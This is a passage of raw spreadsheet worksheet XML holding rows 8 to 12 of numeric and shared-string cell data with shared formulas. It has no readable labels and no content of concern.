      <c r="R8" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S8" s="76" t="s">
        <v>200</v>
      </c>
      <c r="T8" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U8" s="77" t="s">
        <v>201</v>
      </c>
      <c r="V8" s="76" t="s">
        <v>202</v>
      </c>
      <c r="W8" s="76" t="s">
        <v>203</v>
      </c>
      <c r="X8" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y8" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z8" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA8" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB8" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC8" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD8" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE8" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF8" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG8" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH8" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI8" s="78"/>
      <c r="AJ8" s="78"/>
      <c r="AK8" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL8" s="78"/>
      <c r="AM8" s="78"/>
      <c r="AN8" s="78"/>
      <c r="AO8" s="78"/>
      <c r="AP8" s="80"/>
      <c r="AQ8" s="80"/>
      <c r="AR8" s="80"/>
      <c r="AS8" s="80">
        <v>0.0</v>
      </c>
      <c r="AT8" s="80"/>
      <c r="AU8" s="80"/>
      <c r="AV8" s="80"/>
      <c r="AW8" s="80"/>
      <c r="AX8" s="80"/>
      <c r="AY8" s="80"/>
      <c r="AZ8" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA8" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB8" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC8" s="82"/>
      <c r="BD8" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE8" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF8" s="82"/>
      <c r="BG8" s="82"/>
      <c r="BH8" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI8" s="82"/>
      <c r="BJ8" s="82"/>
      <c r="BK8" s="82"/>
      <c r="BL8" s="82"/>
      <c r="BM8" s="83"/>
      <c r="BN8" s="83"/>
      <c r="BO8" s="83"/>
      <c r="BP8" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ8" s="83"/>
      <c r="BR8" s="83"/>
      <c r="BS8" s="83"/>
      <c r="BT8" s="83"/>
      <c r="BU8" s="83"/>
      <c r="BV8" s="83"/>
      <c r="BW8" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX8" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY8" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ8" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA8" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB8" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC8" s="85"/>
      <c r="CD8" s="85"/>
      <c r="CE8" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF8" s="85"/>
      <c r="CG8" s="85"/>
      <c r="CH8" s="85"/>
      <c r="CI8" s="85"/>
      <c r="CJ8" s="86"/>
      <c r="CK8" s="86"/>
      <c r="CL8" s="86"/>
      <c r="CM8" s="86">
        <v>0.0</v>
      </c>
      <c r="CN8" s="86"/>
      <c r="CO8" s="86"/>
      <c r="CP8" s="86"/>
      <c r="CQ8" s="86"/>
      <c r="CR8" s="86"/>
      <c r="CS8" s="86"/>
      <c r="CT8" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU8" s="88">
        <v>2002749.0</v>
      </c>
      <c r="CV8" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CW8" s="88">
        <v>1.0</v>
      </c>
      <c r="CX8" s="79">
        <v>2002749.0</v>
      </c>
      <c r="CY8" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ8" s="88"/>
      <c r="DA8" s="88"/>
      <c r="DB8" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC8" s="88"/>
      <c r="DD8" s="88"/>
      <c r="DE8" s="88"/>
      <c r="DF8" s="88"/>
      <c r="DG8" s="89"/>
      <c r="DH8" s="89"/>
      <c r="DI8" s="89"/>
      <c r="DJ8" s="89">
        <v>0.0</v>
      </c>
      <c r="DK8" s="89"/>
      <c r="DL8" s="89"/>
      <c r="DM8" s="89"/>
      <c r="DN8" s="89"/>
      <c r="DO8" s="89"/>
      <c r="DP8" s="89"/>
      <c r="DQ8" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR8" s="91"/>
      <c r="DS8" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT8" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU8" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV8" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW8" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX8" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY8" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ8" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA8" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB8" s="74">
        <v>7.0</v>
      </c>
      <c r="EC8" s="74">
        <v>0.0</v>
      </c>
      <c r="ED8" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE8" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="9" ht="107.25" customHeight="1">
      <c r="B9" s="71" t="s">
        <v>204</v>
      </c>
      <c r="C9" s="97" t="s">
        <v>12</v>
      </c>
      <c r="D9" s="97" t="s">
        <v>205</v>
      </c>
      <c r="E9" s="72" t="s">
        <v>206</v>
      </c>
      <c r="F9" s="72" t="s">
        <v>207</v>
      </c>
      <c r="G9" s="97" t="s">
        <v>208</v>
      </c>
      <c r="H9" s="72" t="s">
        <v>209</v>
      </c>
      <c r="I9" s="110" t="s">
        <v>210</v>
      </c>
      <c r="J9" s="73" t="s">
        <v>211</v>
      </c>
      <c r="K9" s="73" t="s">
        <v>212</v>
      </c>
      <c r="L9" s="74">
        <v>6950.0</v>
      </c>
      <c r="M9" s="74">
        <v>1.0</v>
      </c>
      <c r="N9" s="74">
        <v>1.0</v>
      </c>
      <c r="O9" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P9" s="74">
        <v>1.0</v>
      </c>
      <c r="Q9" s="74">
        <v>0.0</v>
      </c>
      <c r="R9" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S9" s="76" t="s">
        <v>213</v>
      </c>
      <c r="T9" s="76" t="s">
        <v>214</v>
      </c>
      <c r="U9" s="77" t="s">
        <v>215</v>
      </c>
      <c r="V9" s="76" t="s">
        <v>144</v>
      </c>
      <c r="W9" s="76" t="s">
        <v>216</v>
      </c>
      <c r="X9" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y9" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z9" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA9" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB9" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC9" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD9" s="78" t="s">
        <v>217</v>
      </c>
      <c r="AE9" s="78">
        <v>44.0</v>
      </c>
      <c r="AF9" s="78">
        <v>9562.0</v>
      </c>
      <c r="AG9" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH9" s="78" t="s">
        <v>217</v>
      </c>
      <c r="AI9" s="78"/>
      <c r="AJ9" s="78"/>
      <c r="AK9" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL9" s="78"/>
      <c r="AM9" s="78"/>
      <c r="AN9" s="78"/>
      <c r="AO9" s="78"/>
      <c r="AP9" s="80"/>
      <c r="AQ9" s="80"/>
      <c r="AR9" s="80"/>
      <c r="AS9" s="80">
        <v>0.0</v>
      </c>
      <c r="AT9" s="80"/>
      <c r="AU9" s="80"/>
      <c r="AV9" s="80"/>
      <c r="AW9" s="80"/>
      <c r="AX9" s="80"/>
      <c r="AY9" s="80"/>
      <c r="AZ9" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA9" s="82" t="s">
        <v>218</v>
      </c>
      <c r="BB9" s="82">
        <v>59.0</v>
      </c>
      <c r="BC9" s="82">
        <v>12739.0</v>
      </c>
      <c r="BD9" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE9" s="82" t="s">
        <v>218</v>
      </c>
      <c r="BF9" s="82"/>
      <c r="BG9" s="82"/>
      <c r="BH9" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI9" s="82"/>
      <c r="BJ9" s="82"/>
      <c r="BK9" s="82"/>
      <c r="BL9" s="82"/>
      <c r="BM9" s="83"/>
      <c r="BN9" s="83"/>
      <c r="BO9" s="83"/>
      <c r="BP9" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ9" s="83"/>
      <c r="BR9" s="83"/>
      <c r="BS9" s="83"/>
      <c r="BT9" s="83"/>
      <c r="BU9" s="83"/>
      <c r="BV9" s="83"/>
      <c r="BW9" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX9" s="85" t="s">
        <v>219</v>
      </c>
      <c r="BY9" s="85">
        <v>65.0</v>
      </c>
      <c r="BZ9" s="85">
        <v>732342.0</v>
      </c>
      <c r="CA9" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB9" s="85" t="s">
        <v>219</v>
      </c>
      <c r="CC9" s="85"/>
      <c r="CD9" s="85"/>
      <c r="CE9" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF9" s="85"/>
      <c r="CG9" s="85"/>
      <c r="CH9" s="85"/>
      <c r="CI9" s="85"/>
      <c r="CJ9" s="86"/>
      <c r="CK9" s="86"/>
      <c r="CL9" s="86"/>
      <c r="CM9" s="86">
        <v>0.0</v>
      </c>
      <c r="CN9" s="86"/>
      <c r="CO9" s="86"/>
      <c r="CP9" s="86"/>
      <c r="CQ9" s="86"/>
      <c r="CR9" s="86"/>
      <c r="CS9" s="86"/>
      <c r="CT9" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU9" s="88" t="s">
        <v>220</v>
      </c>
      <c r="CV9" s="88">
        <v>79.0</v>
      </c>
      <c r="CW9" s="88">
        <v>757724.0</v>
      </c>
      <c r="CX9" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY9" s="88" t="s">
        <v>221</v>
      </c>
      <c r="CZ9" s="88"/>
      <c r="DA9" s="88"/>
      <c r="DB9" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC9" s="88"/>
      <c r="DD9" s="88"/>
      <c r="DE9" s="88"/>
      <c r="DF9" s="88"/>
      <c r="DG9" s="89"/>
      <c r="DH9" s="89"/>
      <c r="DI9" s="89"/>
      <c r="DJ9" s="89">
        <v>0.0</v>
      </c>
      <c r="DK9" s="89"/>
      <c r="DL9" s="89"/>
      <c r="DM9" s="89"/>
      <c r="DN9" s="89"/>
      <c r="DO9" s="89"/>
      <c r="DP9" s="89"/>
      <c r="DQ9" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR9" s="91"/>
      <c r="DS9" s="92">
        <v>12648.0</v>
      </c>
      <c r="DT9" s="93">
        <v>1.0</v>
      </c>
      <c r="DU9" s="93">
        <v>304.0</v>
      </c>
      <c r="DV9" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW9" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX9" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY9" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ9" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA9" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB9" s="74">
        <v>6925.0</v>
      </c>
      <c r="EC9" s="74">
        <v>153.0</v>
      </c>
      <c r="ED9" s="95">
        <f t="shared" si="10"/>
        <v>153</v>
      </c>
      <c r="EE9" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="10" ht="96.75" customHeight="1">
      <c r="B10" s="71" t="s">
        <v>204</v>
      </c>
      <c r="C10" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D10" s="97" t="s">
        <v>205</v>
      </c>
      <c r="E10" s="72" t="s">
        <v>222</v>
      </c>
      <c r="F10" s="72" t="s">
        <v>223</v>
      </c>
      <c r="G10" s="72" t="s">
        <v>208</v>
      </c>
      <c r="H10" s="107" t="s">
        <v>224</v>
      </c>
      <c r="I10" s="73" t="s">
        <v>225</v>
      </c>
      <c r="J10" s="73" t="s">
        <v>226</v>
      </c>
      <c r="K10" s="73" t="s">
        <v>227</v>
      </c>
      <c r="L10" s="74">
        <v>129.0</v>
      </c>
      <c r="M10" s="74">
        <v>1.0</v>
      </c>
      <c r="N10" s="74">
        <v>1.0</v>
      </c>
      <c r="O10" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P10" s="74">
        <v>1.0</v>
      </c>
      <c r="Q10" s="74">
        <v>0.0</v>
      </c>
      <c r="R10" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S10" s="76" t="s">
        <v>228</v>
      </c>
      <c r="T10" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U10" s="77" t="s">
        <v>229</v>
      </c>
      <c r="V10" s="76" t="s">
        <v>230</v>
      </c>
      <c r="W10" s="76" t="s">
        <v>231</v>
      </c>
      <c r="X10" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y10" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z10" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA10" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB10" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC10" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD10" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE10" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF10" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG10" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH10" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI10" s="78"/>
      <c r="AJ10" s="78"/>
      <c r="AK10" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL10" s="78"/>
      <c r="AM10" s="78"/>
      <c r="AN10" s="78"/>
      <c r="AO10" s="78"/>
      <c r="AP10" s="80"/>
      <c r="AQ10" s="80"/>
      <c r="AR10" s="80"/>
      <c r="AS10" s="80">
        <v>0.0</v>
      </c>
      <c r="AT10" s="80"/>
      <c r="AU10" s="80"/>
      <c r="AV10" s="80"/>
      <c r="AW10" s="80"/>
      <c r="AX10" s="80"/>
      <c r="AY10" s="80"/>
      <c r="AZ10" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA10" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB10" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC10" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD10" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE10" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF10" s="82"/>
      <c r="BG10" s="82"/>
      <c r="BH10" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI10" s="82"/>
      <c r="BJ10" s="82"/>
      <c r="BK10" s="82"/>
      <c r="BL10" s="82"/>
      <c r="BM10" s="83"/>
      <c r="BN10" s="83"/>
      <c r="BO10" s="83"/>
      <c r="BP10" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ10" s="83"/>
      <c r="BR10" s="83"/>
      <c r="BS10" s="83"/>
      <c r="BT10" s="83"/>
      <c r="BU10" s="83"/>
      <c r="BV10" s="83"/>
      <c r="BW10" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX10" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY10" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ10" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA10" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB10" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC10" s="85"/>
      <c r="CD10" s="85"/>
      <c r="CE10" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF10" s="85"/>
      <c r="CG10" s="85"/>
      <c r="CH10" s="85"/>
      <c r="CI10" s="85"/>
      <c r="CJ10" s="86"/>
      <c r="CK10" s="86"/>
      <c r="CL10" s="86"/>
      <c r="CM10" s="86">
        <v>0.0</v>
      </c>
      <c r="CN10" s="86"/>
      <c r="CO10" s="86"/>
      <c r="CP10" s="86"/>
      <c r="CQ10" s="86"/>
      <c r="CR10" s="86"/>
      <c r="CS10" s="86"/>
      <c r="CT10" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU10" s="88">
        <v>2002749.0</v>
      </c>
      <c r="CV10" s="88">
        <v>1.0</v>
      </c>
      <c r="CW10" s="88">
        <v>3.0</v>
      </c>
      <c r="CX10" s="79">
        <v>2002749.0</v>
      </c>
      <c r="CY10" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ10" s="88"/>
      <c r="DA10" s="88"/>
      <c r="DB10" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC10" s="88"/>
      <c r="DD10" s="88"/>
      <c r="DE10" s="88"/>
      <c r="DF10" s="88"/>
      <c r="DG10" s="89"/>
      <c r="DH10" s="89"/>
      <c r="DI10" s="89"/>
      <c r="DJ10" s="89">
        <v>0.0</v>
      </c>
      <c r="DK10" s="89"/>
      <c r="DL10" s="89"/>
      <c r="DM10" s="89"/>
      <c r="DN10" s="89"/>
      <c r="DO10" s="89"/>
      <c r="DP10" s="89"/>
      <c r="DQ10" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR10" s="91"/>
      <c r="DS10" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT10" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU10" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV10" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW10" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX10" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY10" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ10" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA10" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB10" s="74">
        <v>129.0</v>
      </c>
      <c r="EC10" s="74">
        <v>0.0</v>
      </c>
      <c r="ED10" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE10" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="11" ht="96.75" customHeight="1">
      <c r="B11" s="71" t="s">
        <v>204</v>
      </c>
      <c r="C11" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D11" s="97" t="s">
        <v>205</v>
      </c>
      <c r="E11" s="72" t="s">
        <v>232</v>
      </c>
      <c r="F11" s="72" t="s">
        <v>233</v>
      </c>
      <c r="G11" s="72" t="s">
        <v>234</v>
      </c>
      <c r="H11" s="107" t="s">
        <v>233</v>
      </c>
      <c r="I11" s="73" t="s">
        <v>235</v>
      </c>
      <c r="J11" s="73" t="s">
        <v>236</v>
      </c>
      <c r="K11" s="73" t="s">
        <v>237</v>
      </c>
      <c r="L11" s="74">
        <v>5.0</v>
      </c>
      <c r="M11" s="74">
        <v>1.0</v>
      </c>
      <c r="N11" s="74">
        <v>1.0</v>
      </c>
      <c r="O11" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P11" s="74">
        <v>1.0</v>
      </c>
      <c r="Q11" s="74">
        <v>0.0</v>
      </c>
      <c r="R11" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S11" s="76" t="s">
        <v>238</v>
      </c>
      <c r="T11" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U11" s="77" t="s">
        <v>239</v>
      </c>
      <c r="V11" s="76" t="s">
        <v>240</v>
      </c>
      <c r="W11" s="76" t="s">
        <v>12</v>
      </c>
      <c r="X11" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y11" s="75" t="s">
        <v>241</v>
      </c>
      <c r="Z11" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA11" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB11" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC11" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD11" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE11" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF11" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG11" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH11" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI11" s="78"/>
      <c r="AJ11" s="78"/>
      <c r="AK11" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL11" s="78"/>
      <c r="AM11" s="78"/>
      <c r="AN11" s="78"/>
      <c r="AO11" s="78"/>
      <c r="AP11" s="80"/>
      <c r="AQ11" s="80"/>
      <c r="AR11" s="80"/>
      <c r="AS11" s="80">
        <v>0.0</v>
      </c>
      <c r="AT11" s="80"/>
      <c r="AU11" s="80"/>
      <c r="AV11" s="80"/>
      <c r="AW11" s="80"/>
      <c r="AX11" s="80"/>
      <c r="AY11" s="80"/>
      <c r="AZ11" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA11" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB11" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC11" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD11" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE11" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF11" s="82"/>
      <c r="BG11" s="82"/>
      <c r="BH11" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI11" s="82"/>
      <c r="BJ11" s="82"/>
      <c r="BK11" s="82"/>
      <c r="BL11" s="82"/>
      <c r="BM11" s="83"/>
      <c r="BN11" s="83"/>
      <c r="BO11" s="83"/>
      <c r="BP11" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ11" s="83"/>
      <c r="BR11" s="83"/>
      <c r="BS11" s="83"/>
      <c r="BT11" s="83"/>
      <c r="BU11" s="83"/>
      <c r="BV11" s="83"/>
      <c r="BW11" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX11" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY11" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ11" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA11" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB11" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC11" s="85"/>
      <c r="CD11" s="85"/>
      <c r="CE11" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF11" s="85"/>
      <c r="CG11" s="85"/>
      <c r="CH11" s="85"/>
      <c r="CI11" s="85"/>
      <c r="CJ11" s="86"/>
      <c r="CK11" s="86"/>
      <c r="CL11" s="86"/>
      <c r="CM11" s="86">
        <v>0.0</v>
      </c>
      <c r="CN11" s="86"/>
      <c r="CO11" s="86"/>
      <c r="CP11" s="86"/>
      <c r="CQ11" s="86"/>
      <c r="CR11" s="86"/>
      <c r="CS11" s="86"/>
      <c r="CT11" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU11" s="88" t="s">
        <v>242</v>
      </c>
      <c r="CV11" s="88">
        <v>4.0</v>
      </c>
      <c r="CW11" s="88">
        <v>12.0</v>
      </c>
      <c r="CX11" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY11" s="88" t="s">
        <v>243</v>
      </c>
      <c r="CZ11" s="88"/>
      <c r="DA11" s="88"/>
      <c r="DB11" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC11" s="88"/>
      <c r="DD11" s="88"/>
      <c r="DE11" s="88"/>
      <c r="DF11" s="88"/>
      <c r="DG11" s="89"/>
      <c r="DH11" s="89"/>
      <c r="DI11" s="89"/>
      <c r="DJ11" s="89">
        <v>0.0</v>
      </c>
      <c r="DK11" s="89"/>
      <c r="DL11" s="89"/>
      <c r="DM11" s="89"/>
      <c r="DN11" s="89"/>
      <c r="DO11" s="89"/>
      <c r="DP11" s="89"/>
      <c r="DQ11" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR11" s="91"/>
      <c r="DS11" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT11" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU11" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV11" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW11" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX11" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY11" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ11" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA11" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB11" s="74">
        <v>5.0</v>
      </c>
      <c r="EC11" s="74">
        <v>0.0</v>
      </c>
      <c r="ED11" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE11" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="12" ht="96.75" customHeight="1">
      <c r="B12" s="71" t="s">
        <v>204</v>
      </c>
      <c r="C12" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D12" s="97" t="s">
        <v>205</v>
      </c>
      <c r="E12" s="72" t="s">
        <v>232</v>
      </c>
      <c r="F12" s="72" t="s">
        <v>233</v>
      </c>
      <c r="G12" s="72" t="s">
        <v>234</v>
      </c>
      <c r="H12" s="107" t="s">
        <v>233</v>
      </c>
      <c r="I12" s="73" t="s">
        <v>244</v>
      </c>
      <c r="J12" s="73" t="s">
        <v>236</v>
      </c>
      <c r="K12" s="73" t="s">
        <v>245</v>
      </c>
      <c r="L12" s="74">
        <v>4.0</v>
      </c>
      <c r="M12" s="74">
        <v>1.0</v>
      </c>
      <c r="N12" s="74">
        <v>1.0</v>
      </c>
      <c r="O12" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P12" s="74">
        <v>1.0</v>
      </c>
      <c r="Q12" s="74">
        <v>0.0</v>
      </c>
      <c r="R12" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S12" s="76" t="s">
        <v>238</v>
      </c>
      <c r="T12" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U12" s="77" t="s">
        <v>246</v>
      </c>
      <c r="V12" s="76" t="s">
        <v>247</v>
      </c>
      <c r="W12" s="76" t="s">
        <v>12</v>
      </c>
      <c r="X12" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y12" s="75" t="s">
        <v>241</v>
      </c>
      <c r="Z12" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA12" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB12" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC12" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD12" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE12" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF12" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG12" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH12" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI12" s="78"/>
      <c r="AJ12" s="78"/>
      <c r="AK12" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL12" s="78"/>
      <c r="AM12" s="78"/>
      <c r="AN12" s="78"/>
      <c r="AO12" s="78"/>
      <c r="AP12" s="80"/>
      <c r="AQ12" s="80"/>
      <c r="AR12" s="80"/>
      <c r="AS12" s="80">
        <v>0.0</v>
      </c>
      <c r="AT12" s="80"/>
      <c r="AU12" s="80"/>
      <c r="AV12" s="80"/>
      <c r="AW12" s="80"/>
      <c r="AX12" s="80"/>
      <c r="AY12" s="80"/>
      <c r="AZ12" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA12" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB12" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC12" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD12" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE12" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF12" s="82"/>
      <c r="BG12" s="82"/>
      <c r="BH12" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI12" s="82"/>
      <c r="BJ12" s="82"/>
      <c r="BK12" s="82"/>
      <c r="BL12" s="82"/>
      <c r="BM12" s="83"/>
      <c r="BN12" s="83"/>
      <c r="BO12" s="83"/>
      <c r="BP12" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ12" s="83"/>
      <c r="BR12" s="83"/>
      <c r="BS12" s="83"/>
      <c r="BT12" s="83"/>
      <c r="BU12" s="83"/>
